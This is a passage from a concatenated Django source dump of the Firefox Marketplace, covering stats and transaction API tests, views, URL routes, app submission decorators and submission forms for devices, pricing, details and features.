        self.app.addonuser_set.create(user=self.user)
        # The mixin tests send `data` as the query string; totals need none.
        self.data = None

    def url(self, pk=None, metric=None):
        return reverse('app_stats_total', kwargs={'pk': pk or self.app.pk})

    def test_owner(self):
        eq_(self.client.get(self.url()).status_code, 200)

    def test_perms(self):
        # Non-owners can still read totals with the Stats:View permission.
        self.app.addonuser_set.all().delete()
        self.grant_permission(self.profile, 'Stats:View')
        eq_(self.client.get(self.url()).status_code, 200)

    def test_bad_app(self):
        eq_(self.client.get(self.url(pk=99999999)).status_code, 404)
class TestTransactionResource(RestOAuth):
    """Tests for the transaction lookup API (needs RevenueStats:View)."""
    fixtures = fixture('prices', 'user_2519', 'webapp_337141')

    def setUp(self):
        super(TestTransactionResource, self).setUp()
        # One known contribution to look up by its transaction id.
        Contribution.objects.create(
            addon_id=337141,
            amount='1.89',
            currency='EUR',
            price_tier_id=2,
            uuid='abcdef123456',
            transaction_id='abc-def',
            type=1,
            user=self.user
        )

    def url(self, t_id=None):
        t_id = t_id or 'abc-def'
        return reverse('transaction_api', kwargs={'transaction_id': t_id})

    def test_cors(self):
        res = self.client.get(self.url())
        self.assertCORS(res, 'get')

    def test_verbs(self):
        self.grant_permission(self.profile, 'RevenueStats:View')
        self._allowed_verbs(self.url(), ['get'])

    def test_anon(self):
        res = self.anon.get(self.url())
        eq_(res.status_code, 403)

    def test_bad_txn(self):
        self.grant_permission(self.profile, 'RevenueStats:View')
        res = self.client.get(self.url('foo'))
        eq_(res.status_code, 404)

    def test_good_but_no_permission(self):
        res = self.client.get(self.url())
        eq_(res.status_code, 403)

    def test_good(self):
        self.grant_permission(self.profile, 'RevenueStats:View')
        res = self.client.get(self.url())
        eq_(res.status_code, 200)
        obj = json.loads(res.content)
        eq_(obj['id'], 'abc-def')
        eq_(obj['app_id'], 337141)
        # amount_USD comes from the price tier, not the contribution amount.
        eq_(obj['amount_USD'], '1.99')
        eq_(obj['type'], 'Purchase')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
# Stats API URLs: global and per-app metric series plus totals endpoints.
stats_api_patterns = patterns('',
    url(r'^stats/global/totals/$', views.GlobalStatsTotal.as_view(),
        name='global_stats_total'),
    url(r'^stats/global/(?P<metric>[^/]+)/$', views.GlobalStats.as_view(),
        name='global_stats'),
    url(r'^stats/app/(?P<pk>[^/<>"\']+)/totals/$',
        views.AppStatsTotal.as_view(), name='app_stats_total'),
    url(r'^stats/app/(?P<pk>[^/<>"\']+)/(?P<metric>[^/]+)/$',
        views.AppStats.as_view(), name='app_stats'),
)

# Transaction lookup API (used by Monolith to resolve Solitude transactions).
txn_api_patterns = patterns('',
    url(r'^transaction/(?P<transaction_id>[^/]+)/$',
        views.TransactionAPI.as_view(),
        name='transaction_api'),
)
########NEW FILE########
__FILENAME__ = views
from django import http
import commonware
import requests
from rest_framework.exceptions import ParseError
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from lib.metrics import get_monolith_client
import amo
from stats.models import Contribution
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowAppOwner, AnyOf, GroupPermission
from mkt.api.base import CORSMixin, SlugOrIdMixin
from mkt.api.exceptions import ServiceUnavailable
from mkt.webapps.models import Webapp
from .forms import StatsForm
log = commonware.log.getLogger('z.stats')
# Map of URL metric name to monolith metric name.
#
# The 'dimensions' key is optional query string arguments with defaults that is
# passed to the monolith client and used in the facet filters. If the default
# is `None`, the dimension is excluded unless specified via the API.
#
# The 'lines' key is optional and used for multi-line charts. The format is:
# {'<name>': {'<dimension-key>': '<dimension-value>'}}
# where <name> is what's returned in the JSON output and the dimension
# key/value is what's sent to Monolith similar to the 'dimensions' above.
#
# The 'coerce' key is optional and used to coerce data types returned from
# monolith to other types. Provide the name of the key in the data you want to
# coerce with a callback for how you want the data coerced. E.g.:
# {'count': str}
def lines(name, vals):
    """Build the 'lines' mapping for a multi-line chart.

    Returns {<value>: {<name>: <value>}} for each value in `vals`, i.e. one
    monolith dimension filter per charted line (see the STATS docs above).

    Converted from a `lambda` assignment to a named `def` (PEP 8) so the
    function has a proper __name__ and a docstring; behavior is unchanged.
    """
    return dict((val, {name: val}) for val in vals)
# Global (site-wide) metrics, keyed by the URL metric name.
STATS = {
    'apps_added_by_package': {
        'metric': 'apps_added_package_count',
        'dimensions': {'region': 'us'},
        'lines': lines('package_type', amo.ADDON_WEBAPP_TYPES.values()),
    },
    'apps_added_by_premium': {
        'metric': 'apps_added_premium_count',
        'dimensions': {'region': 'us'},
        'lines': lines('premium_type', amo.ADDON_PREMIUM_API.values()),
    },
    'apps_available_by_package': {
        'metric': 'apps_available_package_count',
        'dimensions': {'region': 'us'},
        'lines': lines('package_type', amo.ADDON_WEBAPP_TYPES.values()),
    },
    'apps_available_by_premium': {
        'metric': 'apps_available_premium_count',
        'dimensions': {'region': 'us'},
        'lines': lines('premium_type', amo.ADDON_PREMIUM_API.values()),
    },
    'apps_installed': {
        'metric': 'app_installs',
        # None default: no region filter unless one is passed in the query.
        'dimensions': {'region': None},
    },
    'total_developers': {
        'metric': 'total_dev_count',
    },
    'total_visits': {
        'metric': 'visits',
    },
    'ratings': {
        'metric': 'apps_ratings',
    },
    'abuse_reports': {
        'metric': 'apps_abuse_reports',
    },
    'revenue': {
        'metric': 'gross_revenue',
        # Counts are floats. Let's convert them to strings with 2 decimals.
        'coerce': {'count': lambda d: '{0:.2f}'.format(d)},
    },
}

# Per-app metrics, keyed by the URL metric name.
APP_STATS = {
    'installs': {
        'metric': 'app_installs',
        # None default: no region filter unless one is passed in the query.
        'dimensions': {'region': None},
    },
    'visits': {
        'metric': 'app_visits',
    },
    'ratings': {
        'metric': 'apps_ratings',
    },
    'average_rating': {
        'metric': 'apps_average_rating',
    },
    'abuse_reports': {
        'metric': 'apps_abuse_reports',
    },
    'revenue': {
        'metric': 'gross_revenue',
        # Counts are floats. Let's convert them to strings with 2 decimals.
        'coerce': {'count': lambda d: '{0:.2f}'.format(d)},
    },
}

# The total API will iterate over each key and return statistical totals
# information on them all.
STATS_TOTAL = {
    'installs': {
        'metric': 'app_installs',
    },
    'ratings': {
        'metric': 'apps_ratings',
    },
    'abuse_reports': {
        'metric': 'apps_abuse_reports',
    },
}

# Same shape as STATS_TOTAL, but consumed by the per-app totals view.
APP_STATS_TOTAL = {
    'installs': {
        'metric': 'app_installs',
    },
    'ratings': {
        'metric': 'apps_ratings',
    },
    'abuse_reports': {
        'metric': 'apps_abuse_reports',
    },
}
def _get_monolith_data(stat, start, end, interval, dimensions):
    """Query monolith for one stat definition and return chart data.

    `stat` is an entry of STATS/APP_STATS: a monolith metric name plus
    optional 'lines', 'dimensions' and 'coerce' configuration. `dimensions`
    is the dict of facet-filter kwargs passed through to the client (mutated
    in place when building multi-line charts).

    Raises ServiceUnavailable when monolith can't be reached and ParseError
    when monolith rejects the metric.
    """
    # If stat has a 'lines' attribute, it's a multi-line graph. Do a
    # request for each item in 'lines' and compose them in a single
    # response.
    try:
        client = get_monolith_client()
    except requests.ConnectionError as e:
        log.info('Monolith connection error: {0}'.format(e))
        raise ServiceUnavailable

    def _coerce(data):
        # Apply the stat's 'coerce' callbacks to each data point, in place.
        for key, coerce in stat.get('coerce', {}).items():
            if data.get(key):
                data[key] = coerce(data[key])
        return data

    try:
        data = {}
        if 'lines' in stat:
            # One monolith request per line, keyed by the line's name.
            for line_name, line_dimension in stat['lines'].items():
                dimensions.update(line_dimension)
                data[line_name] = map(_coerce,
                                      client(stat['metric'], start, end,
                                             interval, **dimensions))
        else:
            data['objects'] = map(_coerce,
                                  client(stat['metric'], start, end, interval,
                                         **dimensions))
    except ValueError as e:
        # This occurs if monolith doesn't have our metric and we get an
        # elasticsearch SearchPhaseExecutionException error.
        log.info('Monolith ValueError for metric {0}: {1}'.format(
            stat['metric'], e))
        raise ParseError('Invalid metric at this time. Try again later.')
    return data
class GlobalStats(CORSMixin, APIView):
    """Global (site-wide) metric series, keyed by the STATS mapping."""
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    cors_allowed_methods = ['get']
    permission_classes = [GroupPermission('Stats', 'View')]

    def get(self, request, metric):
        if metric not in STATS:
            raise http.Http404('No metric by that name.')
        stat = STATS[metric]

        # Validate the start/end/interval query-string arguments.
        form = StatsForm(request.GET)
        if not form.is_valid():
            raise ParseError(dict(form.errors.items()))
        cleaned = form.cleaned_data

        # Collect dimension filters, honoring per-metric defaults. A value
        # of None means "no facet filter", so the kwarg is omitted entirely.
        dimensions = {}
        for key, default in stat.get('dimensions', {}).items():
            value = request.GET.get(key, default)
            if value is not None:
                dimensions[key] = value

        return Response(_get_monolith_data(stat, cleaned.get('start'),
                                           cleaned.get('end'),
                                           cleaned.get('interval'),
                                           dimensions))
class AppStats(CORSMixin, SlugOrIdMixin, ListAPIView):
    """Per-app metric series, keyed by the APP_STATS mapping."""
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    cors_allowed_methods = ['get']
    permission_classes = [AnyOf(AllowAppOwner,
                                GroupPermission('Stats', 'View'))]
    queryset = Webapp.objects.all()
    slug_field = 'app_slug'

    def get(self, request, pk, metric):
        if metric not in APP_STATS:
            raise http.Http404('No metric by that name.')
        app = self.get_object()
        stat = APP_STATS[metric]

        # Validate the start/end/interval query-string arguments.
        form = StatsForm(request.GET)
        if not form.is_valid():
            raise ParseError(dict(form.errors.items()))
        cleaned = form.cleaned_data

        # Always constrain the query to this app, then add any optional
        # dimensions; a value of None means "no facet filter", so the kwarg
        # is omitted entirely.
        dimensions = {'app-id': app.id}
        for key, default in stat.get('dimensions', {}).items():
            value = request.GET.get(key, default)
            if value is not None:
                dimensions[key] = value

        return Response(_get_monolith_data(stat, cleaned.get('start'),
                                           cleaned.get('end'),
                                           cleaned.get('interval'),
                                           dimensions))
class StatsTotalBase(object):
    """
    A place for a few helper methods for totals stats API.
    """

    def get_client(self):
        """Return a monolith client, or raise ServiceUnavailable if down."""
        try:
            return get_monolith_client()
        except requests.ConnectionError as e:
            log.info('Monolith connection error: {0}'.format(e))
            raise ServiceUnavailable

    def get_query(self, metric, field, app_id=None):
        """Build an ES statistical-facet query over `field`, optionally
        restricted to a single app via a facet filter."""
        facet = {'statistical': {'field': field}}
        # If this is per-app, add the facet_filter.
        if app_id:
            facet['facet_filter'] = {'term': {'app-id': app_id}}
        return {
            'query': {'match_all': {}},
            'facets': {metric: facet},
            'size': 0,
        }

    def process_response(self, resp, data):
        """Copy statistical facet values from `resp` into `data` in place."""
        for metric, facet in resp.get('facets', {}).items():
            # We filter out facets with count=0 to avoid returning things
            # like `'max': u'-Infinity'`.
            if facet.get('count', 0) > 0:
                for field in ('max', 'mean', 'min', 'std_deviation',
                              'sum_of_squares', 'total', 'variance'):
                    value = facet.get(field)
                    if value is not None:
                        data[metric][field] = value
class GlobalStatsTotal(CORSMixin, APIView, StatsTotalBase):
    """Site-wide statistical totals over every metric in STATS_TOTAL."""
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    cors_allowed_methods = ['get']
    permission_classes = [GroupPermission('Stats', 'View')]
    slug_field = 'app_slug'

    def get(self, request):
        client = self.get_client()

        # Note: We have to do this as separate requests so that if one fails
        # the rest can still be returned.
        data = {}
        for metric, stat in STATS_TOTAL.items():
            data[metric] = {}
            query = self.get_query(metric, stat['metric'])
            try:
                resp = client.raw(query)
            except ValueError as e:
                # Leave this metric's entry empty and continue with the rest.
                log.info('Received value error from monolith client: %s' % e)
                continue
            self.process_response(resp, data)
        return Response(data)
class AppStatsTotal(CORSMixin, SlugOrIdMixin, ListAPIView, StatsTotalBase):
    """Per-app statistical totals over every metric in APP_STATS_TOTAL."""
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    cors_allowed_methods = ['get']
    permission_classes = [AnyOf(AllowAppOwner,
                                GroupPermission('Stats', 'View'))]
    queryset = Webapp.objects.all()
    slug_field = 'app_slug'

    def get(self, request, pk):
        app = self.get_object()
        client = self.get_client()

        # Note: We have to do this as separate requests so that if one fails
        # the rest can still be returned.
        data = {}
        for metric, stat in APP_STATS_TOTAL.items():
            data[metric] = {}
            # Restrict the facet query to this app.
            query = self.get_query(metric, stat['metric'], app.id)
            try:
                resp = client.raw(query)
            except ValueError as e:
                # Leave this metric's entry empty and continue with the rest.
                log.info('Received value error from monolith client: %s' % e)
                continue
            self.process_response(resp, data)
        return Response(data)
class TransactionAPI(CORSMixin, APIView):
    """
    API to query by transaction ID.

    Note: This is intended for Monolith to be able to associate a Solitude
    transaction with an app and price tier amount in USD.
    """
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    cors_allowed_methods = ['get']
    permission_classes = [GroupPermission('RevenueStats', 'View')]

    def get(self, request, transaction_id):
        try:
            contrib = (Contribution.objects.select_related('price_tier').
                       get(transaction_id=transaction_id))
        except Contribution.DoesNotExist:
            raise http.Http404('No transaction by that ID.')

        data = {
            'id': transaction_id,
            'app_id': contrib.addon_id,
            # USD amount comes from the price tier, not the raw contribution.
            'amount_USD': contrib.price_tier.price,
            'type': amo.CONTRIB_TYPES[contrib.type],
        }
        return Response(data)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.shortcuts import redirect
def submit_step(outer_step):
    """Wraps the function with a decorator that bounces to the right step."""
    def decorator(f):
        @functools.wraps(f)
        def wrapper(request, *args, **kw):
            # Imported lazily to avoid circular imports at module load time.
            from mkt.submit.views import _resume
            from mkt.submit.models import AppSubmissionChecklist
            addon = kw.get('addon', False)
            if addon:
                try:
                    pending_step = addon.appsubmissionchecklist.get_next()
                except AppSubmissionChecklist.DoesNotExist:
                    pending_step = None
                # Redirect to the pending step when it isn't this view's.
                if pending_step and pending_step != outer_step:
                    return _resume(addon, pending_step)
            return f(request, *args, **kw)
        # Flag used elsewhere to recognize submission-flow views.
        wrapper.submitting = True
        return wrapper
    return decorator
def read_dev_agreement_required(f):
    """
    Decorator that checks if the user has read the dev agreement, redirecting
    if not.
    """
    # The original defined an inner decorator and applied it immediately;
    # wrapping `f` directly is equivalent.
    @functools.wraps(f)
    def wrapper(request, *args, **kw):
        if not request.amo_user.read_dev_agreement:
            return redirect('submit.app')
        return f(request, *args, **kw)
    return wrapper
########NEW FILE########
__FILENAME__ = forms
import datetime
import os
from collections import defaultdict
from django import forms
from django.conf import settings
import basket
import happyforms
import waffle
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from addons.models import Addon, AddonUpsell, BlacklistedSlug, Webapp
from amo.utils import slug_validator
from apps.users.models import UserNotification
from apps.users.notifications import app_surveys
from editors.models import RereviewQueue
from files.models import FileUpload
from files.utils import parse_addon
from translations.fields import TransField
from translations.forms import TranslationFormMixin
from translations.widgets import TransInput, TransTextarea
from mkt.constants import APP_FEATURES, FREE_PLATFORMS, PAID_PLATFORMS
from mkt.site.forms import AddonChoiceField, APP_PUBLIC_CHOICES
from mkt.webapps.models import AppFeatures
from mkt.prices.models import AddonPremium, Price
from mkt.developers.forms import verify_app_domain
def mark_for_rereview(addon, added_devices, removed_devices):
    """Flag `addon` for re-review after its supported device types changed."""
    msg = _(u'Device(s) changed: {0}').format(', '.join(
        [_(u'Added {0}').format(unicode(amo.DEVICE_TYPES[d].name))
         for d in added_devices] +
        [_(u'Removed {0}').format(unicode(amo.DEVICE_TYPES[d].name))
         for d in removed_devices]))
    RereviewQueue.flag(addon, amo.LOG.REREVIEW_DEVICES_ADDED, msg)
def mark_for_rereview_features_change(addon, added_features, removed_features):
    """Flag `addon` for re-review after its required app features changed."""
    # L10n: {0} is the list of requirements changes.
    msg = _(u'Requirements changed: {0}').format(', '.join(
        [_(u'Added {0}').format(f) for f in added_features] +
        [_(u'Removed {0}').format(f) for f in removed_features]))
    RereviewQueue.flag(addon, amo.LOG.REREVIEW_FEATURES_CHANGED, msg)
class DeviceTypeForm(happyforms.Form):
    """Handles the free/paid platform selection for an app submission."""

    ERRORS = {
        'both': _lazy(u'Cannot be free and paid.'),
        'none': _lazy(u'Please select a device.'),
        'packaged': _lazy(u'Packaged apps are not yet supported for those '
                          u'platforms.'),
    }

    free_platforms = forms.MultipleChoiceField(
        choices=FREE_PLATFORMS(), required=False)
    paid_platforms = forms.MultipleChoiceField(
        choices=PAID_PLATFORMS(), required=False)

    def save(self, addon, is_paid):
        """Sync the addon's device types with the submitted platforms."""
        data = self.cleaned_data[
            'paid_platforms' if is_paid else 'free_platforms']
        # Choices look like 'free-<platform>'/'paid-<platform>'; strip prefix.
        submitted_data = self.get_devices(t.split('-', 1)[1] for t in data)

        new_types = set(dev.id for dev in submitted_data)
        old_types = set(amo.DEVICE_TYPES[x.id].id for x in addon.device_types)

        added_devices = new_types - old_types
        removed_devices = old_types - new_types

        for d in added_devices:
            addon.addondevicetype_set.create(device_type=d)
        for d in removed_devices:
            addon.addondevicetype_set.filter(device_type=d).delete()

        # Send app to re-review queue if public and new devices are added.
        if added_devices and addon.status in amo.WEBAPPS_APPROVED_STATUSES:
            mark_for_rereview(addon, added_devices, removed_devices)

    def _add_error(self, msg):
        # Mirror the error on both platform fields so either widget shows it.
        self._errors['free_platforms'] = self._errors['paid_platforms'] = (
            self.ERRORS[msg])

    def _get_combined(self):
        # Strip the 'free-'/'paid-' prefixes and de-dupe the platform names.
        devices = (self.cleaned_data.get('free_platforms', []) +
                   self.cleaned_data.get('paid_platforms', []))
        return set(d.split('-', 1)[1] for d in devices)

    def _set_packaged_errors(self):
        """Add packaged-app submission errors for incompatible platforms."""
        # NOTE(review): relies on `self.request` being set by a subclass
        # (e.g. NewWebappForm) — confirm before using this form standalone.
        devices = self._get_combined()
        bad_android = (
            not waffle.flag_is_active(self.request, 'android-packaged') and
            ('android-mobile' in devices or 'android-tablet' in devices)
        )
        bad_desktop = (
            not waffle.flag_is_active(self.request, 'desktop-packaged') and
            'desktop' in devices
        )
        if bad_android or bad_desktop:
            self._errors['free_platforms'] = self._errors['paid_platforms'] = (
                self.ERRORS['packaged'])

    def clean(self):
        data = self.cleaned_data
        paid = data.get('paid_platforms', [])
        free = data.get('free_platforms', [])
        # Check that they didn't select both.
        if free and paid:
            self._add_error('both')
            return data
        # Check that they selected one.
        if not free and not paid:
            self._add_error('none')
            return data
        return super(DeviceTypeForm, self).clean()

    def get_devices(self, source=None):
        """Returns a device based on the requested free or paid."""
        if source is None:
            source = self._get_combined()
        platforms = {'firefoxos': amo.DEVICE_GAIA,
                     'desktop': amo.DEVICE_DESKTOP,
                     'android-mobile': amo.DEVICE_MOBILE,
                     'android-tablet': amo.DEVICE_TABLET}
        return map(platforms.get, source)

    def is_paid(self):
        # True when any paid platform was selected.
        return bool(self.cleaned_data.get('paid_platforms', False))

    def get_paid(self):
        """Returns the premium type. Should not be used if the form is used to
        modify an existing app.
        """
        return amo.ADDON_PREMIUM if self.is_paid() else amo.ADDON_FREE
class DevAgreementForm(happyforms.Form):
    """Developer agreement acceptance, with optional newsletter signup."""
    read_dev_agreement = forms.BooleanField(label=_lazy(u'Agree and Continue'),
                                            widget=forms.HiddenInput)
    newsletter = forms.BooleanField(required=False, label=app_surveys.label,
                                    widget=forms.CheckboxInput)

    def __init__(self, *args, **kw):
        # `instance` is the user profile being updated; `request` supplies
        # the region/language used for the newsletter subscription.
        self.instance = kw.pop('instance')
        self.request = kw.pop('request')
        super(DevAgreementForm, self).__init__(*args, **kw)

    def save(self):
        # Record the acceptance timestamp on the user profile.
        self.instance.read_dev_agreement = datetime.datetime.now()
        self.instance.save()
        if self.cleaned_data.get('newsletter'):
            # Opt the user into the app-dev survey notification and basket
            # newsletter.
            UserNotification.update_or_create(user=self.instance,
                notification_id=app_surveys.id, update={'enabled': True})
            basket.subscribe(self.instance.email,
                             'app-dev',
                             format='H',
                             country=self.request.REGION.slug,
                             lang=self.request.LANG,
                             source_url=os.path.join(settings.SITE_URL,
                                                     'developers/submit'))
class NewWebappVersionForm(happyforms.Form):
    """Validates a new version upload (hosted manifest or packaged app)."""
    upload_error = _lazy(u'There was an error with your upload. '
                         u'Please try again.')
    upload = forms.ModelChoiceField(widget=forms.HiddenInput,
        queryset=FileUpload.objects.filter(valid=True),
        error_messages={'invalid_choice': upload_error})

    def __init__(self, *args, **kw):
        request = kw.pop('request', None)
        self.addon = kw.pop('addon', None)
        self._is_packaged = kw.pop('is_packaged', False)
        super(NewWebappVersionForm, self).__init__(*args, **kw)

        # Paid submissions are gated behind a waffle flag.
        if (not waffle.flag_is_active(request, 'allow-b2g-paid-submission')
            and 'paid_platforms' in self.fields):
            del self.fields['paid_platforms']

    def clean(self):
        data = self.cleaned_data
        if 'upload' not in self.cleaned_data:
            self._errors['upload'] = self.upload_error
            return

        if self.is_packaged():
            # Now run the packaged app check, done in clean, because
            # clean_packaged needs to be processed first.
            try:
                pkg = parse_addon(data['upload'], self.addon)
            except forms.ValidationError, e:
                self._errors['upload'] = self.error_class(e.messages)
                return

            ver = pkg.get('version')
            # Reject duplicate version numbers for the same app.
            if (ver and self.addon and
                self.addon.versions.filter(version=ver).exists()):
                self._errors['upload'] = _(u'Version %s already exists') % ver
                return

            origin = pkg.get('origin')
            if origin:
                try:
                    # Validate and normalize the app origin from the package.
                    origin = verify_app_domain(origin, packaged=True,
                                               exclude=self.addon)
                except forms.ValidationError, e:
                    self._errors['upload'] = self.error_class(e.messages)
                    return
                if origin:
                    data['origin'] = origin
        else:
            # Throw an error if this is a dupe.
            # (JS sets manifest as `upload.name`.)
            try:
                verify_app_domain(data['upload'].name)
            except forms.ValidationError, e:
                self._errors['upload'] = self.error_class(e.messages)
                return
        return data

    def is_packaged(self):
        return self._is_packaged
class NewWebappForm(DeviceTypeForm, NewWebappVersionForm):
    """Combined device-type + upload form used for new app submissions."""
    upload = forms.ModelChoiceField(widget=forms.HiddenInput,
        queryset=FileUpload.objects.filter(valid=True),
        error_messages={'invalid_choice': _lazy(
            u'There was an error with your upload. Please try again.')})
    packaged = forms.BooleanField(required=False)

    def __init__(self, *args, **kwargs):
        self.request = kwargs.pop('request', None)
        super(NewWebappForm, self).__init__(*args, **kwargs)
        if 'paid_platforms' in self.fields:
            # Paid platform choices depend on waffle flags for this request.
            self.fields['paid_platforms'].choices = PAID_PLATFORMS(
                self.request)

    # NOTE: a `_add_error` override with a body byte-identical to
    # DeviceTypeForm._add_error used to live here; the inherited
    # implementation is used instead.

    def clean(self):
        data = super(NewWebappForm, self).clean()
        if not data:
            return
        if self.is_packaged():
            # Packaged apps have extra per-platform restrictions.
            self._set_packaged_errors()
            if self._errors.get('free_platforms'):
                return
        return data

    def is_packaged(self):
        # Packaged either via constructor kwarg or the submitted checkbox.
        return self._is_packaged or self.cleaned_data.get('packaged', False)
class UpsellForm(happyforms.Form):
    """Price selection for a paid app, plus an optional free app to upsell."""
    price = forms.ModelChoiceField(queryset=Price.objects.active(),
                                   label=_lazy(u'App Price'),
                                   empty_label=None,
                                   required=True)
    make_public = forms.TypedChoiceField(choices=APP_PUBLIC_CHOICES,
        widget=forms.RadioSelect(),
        label=_lazy(u'When should your app be '
                    'made available for sale?'),
        coerce=int,
        required=False)
    free = AddonChoiceField(queryset=Addon.objects.none(),
        required=False, empty_label='',
        # L10n: "App" is a paid version of this app. "from" is this app.
        label=_lazy(u'App to upgrade from'),
        widget=forms.Select())

    def __init__(self, *args, **kw):
        self.extra = kw.pop('extra')
        self.request = kw.pop('request')
        self.addon = self.extra['addon']

        if 'initial' not in kw:
            kw['initial'] = {}

        kw['initial']['make_public'] = amo.PUBLIC_IMMEDIATELY
        if self.addon.premium:
            kw['initial']['price'] = self.addon.premium.price

        super(UpsellForm, self).__init__(*args, **kw)

        # Only the current user's other free apps of the same type are
        # eligible upsell sources.
        self.fields['free'].queryset = (self.extra['amo_user'].addons
                                        .exclude(pk=self.addon.pk)
                                        .filter(premium_type__in=amo.ADDON_FREES,
                                                status__in=amo.VALID_STATUSES,
                                                type=self.addon.type))

        if len(self.fields['price'].choices) > 1:
            # Tier 0 (Free) should not be the default selection.
            self.initial['price'] = (Price.objects.active()
                                     .exclude(price='0.00')[0])

    def clean_make_public(self):
        # A truthy choice means "hold until manually published".
        return (amo.PUBLIC_WAIT if self.cleaned_data.get('make_public')
                else None)

    def save(self):
        if 'price' in self.cleaned_data:
            premium = self.addon.premium
            if not premium:
                premium = AddonPremium()
                premium.addon = self.addon
            premium.price = self.cleaned_data['price']
            premium.save()

        upsell = self.addon.upsold
        if self.cleaned_data['free']:
            # Check if this app was already a premium version for another app.
            if upsell and upsell.free != self.cleaned_data['free']:
                upsell.delete()
            if not upsell:
                upsell = AddonUpsell(premium=self.addon)
            upsell.free = self.cleaned_data['free']
            upsell.save()
        elif upsell:
            # No upsell source selected anymore: drop the relation.
            upsell.delete()

        self.addon.update(make_public=self.cleaned_data['make_public'])
class AppDetailsBasicForm(TranslationFormMixin, happyforms.ModelForm):
    """Form for "Details" submission step."""
    app_slug = forms.CharField(max_length=30,
                               widget=forms.TextInput(attrs={'class': 'm'}))
    description = TransField(required=True,
        label=_lazy(u'Description:'),
        help_text=_lazy(u'This description will appear on the details page.'),
        widget=TransTextarea(attrs={'rows': 4}))
    privacy_policy = TransField(widget=TransTextarea(attrs={'rows': 6}),
        label=_lazy(u'Privacy Policy:'),
        help_text=_lazy(u"A privacy policy that explains what "
                        "data is transmitted from a user's computer and how "
                        "it is used is required."))
    homepage = TransField.adapt(forms.URLField)(required=False,
        label=_lazy(u'Homepage:'),
        help_text=_lazy(u'If your app has another homepage, enter its address '
                        'here.'),
        widget=TransInput(attrs={'class': 'full'}))
    support_url = TransField.adapt(forms.URLField)(required=False,
        label=_lazy(u'Support Website:'),
        help_text=_lazy(u'If your app has a support website or forum, enter '
                        'its address here.'),
        widget=TransInput(attrs={'class': 'full'}))
    support_email = TransField.adapt(forms.EmailField)(
        label=_lazy(u'Support Email:'),
        help_text=_lazy(u'This email address will be listed publicly on the '
                        u'Marketplace and used by end users to contact you '
                        u'with support issues. This email address will be '
                        u'listed publicly on your app details page.'),
        widget=TransInput(attrs={'class': 'full'}))
    flash = forms.TypedChoiceField(required=False,
        coerce=lambda x: bool(int(x)),
        label=_lazy(u'Does your app require Flash support?'),
        initial=0,
        choices=(
            (1, _lazy(u'Yes')),
            (0, _lazy(u'No')),
        ),
        widget=forms.RadioSelect)
    publish = forms.BooleanField(required=False, initial=1,
        label=_lazy(u"Publish my app in the Firefox Marketplace as soon as "
                    "it's reviewed."),
        help_text=_lazy(u"If selected your app will be published immediately "
                        "following its approval by reviewers. If you don't "
                        "select this option you will be notified via email "
                        "about your app's approval and you will need to log "
                        "in and manually publish it."))

    class Meta:
        model = Addon
        fields = ('app_slug', 'description', 'privacy_policy', 'homepage',
                  'support_url', 'support_email')

    def __init__(self, *args, **kwargs):
        self.request = kwargs.pop('request')
        super(AppDetailsBasicForm, self).__init__(*args, **kwargs)

    def clean_app_slug(self):
        """Validate the slug, rejecting duplicates and blacklisted values."""
        slug = self.cleaned_data['app_slug']
        slug_validator(slug, lower=False)

        if slug != self.instance.app_slug:
            if Webapp.objects.filter(app_slug=slug).exists():
                raise forms.ValidationError(
                    _('This slug is already in use. Please choose another.'))
            if BlacklistedSlug.blocked(slug):
                # Interpolate *after* the translation lookup: formatting the
                # slug into the string first meant the msgid never matched
                # the gettext catalog, so this message was never translated.
                raise forms.ValidationError(
                    _('The slug cannot be "%s". Please choose another.')
                    % slug)
        return slug.lower()

    def save(self, *args, **kw):
        self.instance = super(AppDetailsBasicForm, self).save(commit=True)
        # Propagate the Flash requirement onto the latest uploaded file.
        uses_flash = self.cleaned_data.get('flash')
        af = self.instance.get_latest_file()
        if af is not None:
            af.update(uses_flash=bool(uses_flash))
        return self.instance
class AppFeaturesForm(happyforms.ModelForm):
    """ModelForm over AppFeatures; flags requirement changes for re-review."""

    class Meta:
        exclude = ['version']
        model = AppFeatures

    def __init__(self, *args, **kwargs):
        super(AppFeaturesForm, self).__init__(*args, **kwargs)
        if self.instance:
            # Snapshot the enabled feature keys so save() can detect changes.
            self.initial_features = sorted(self.instance.to_keys())
        else:
            self.initial_features = None

    def all_fields(self):
        """
        Degeneratorizes self.__iter__(), the list of fields on the form. This
        allows further manipulation of fields: to display a subset of fields or
        order them in a specific way.
        """
        return [f for f in self.__iter__()]

    def required_api_fields(self):
        """
        All fields on the form, alphabetically sorted by help text.
        """
        return sorted(self.all_fields(), key=lambda x: x.help_text)

    def get_tooltip(self, field):
        # Field names look like 'has_<feature>'; the APP_FEATURES key is the
        # uppercased part after the first underscore.
        field_id = field.name.split('_', 1)[1].upper()
        return (unicode(APP_FEATURES[field_id].get('description') or '') if
                field_id in APP_FEATURES else None)

    def _changed_features(self):
        """Return (added, removed) sets of human-readable feature names."""
        # NOTE(review): defaultdict.fromkeys behaves like dict.fromkeys here
        # (no default factory is set); a plain dict would do.
        old_features = defaultdict.fromkeys(self.initial_features, True)
        old_features = set(unicode(f) for f
                           in AppFeatures(**old_features).to_list())
        new_features = set(unicode(f) for f in self.instance.to_list())

        added_features = new_features - old_features
        removed_features = old_features - new_features
        return added_features, removed_features

    def save(self, *args, **kwargs):
        mark_for_rereview = kwargs.pop('mark_for_rereview', True)
        addon = self.instance.version.addon
        rval = super(AppFeaturesForm, self).save(*args, **kwargs)
        # Approved apps whose feature requirements changed get re-reviewed.
        if (self.instance and mark_for_rereview and
            addon.status in amo.WEBAPPS_APPROVED_STATUSES and
            sorted(self.instance.to_keys()) != self.initial_features):
            added_features, removed_features = self._changed_features()
            mark_for_rereview_features_change(addon,
                                              added_features,
                                              removed_features)
        return rval
########NEW FILE########
__FILENAME__ = helpers
from jingo import register, env
import jinja2
from tower import ugettext as _
import waffle
import mkt
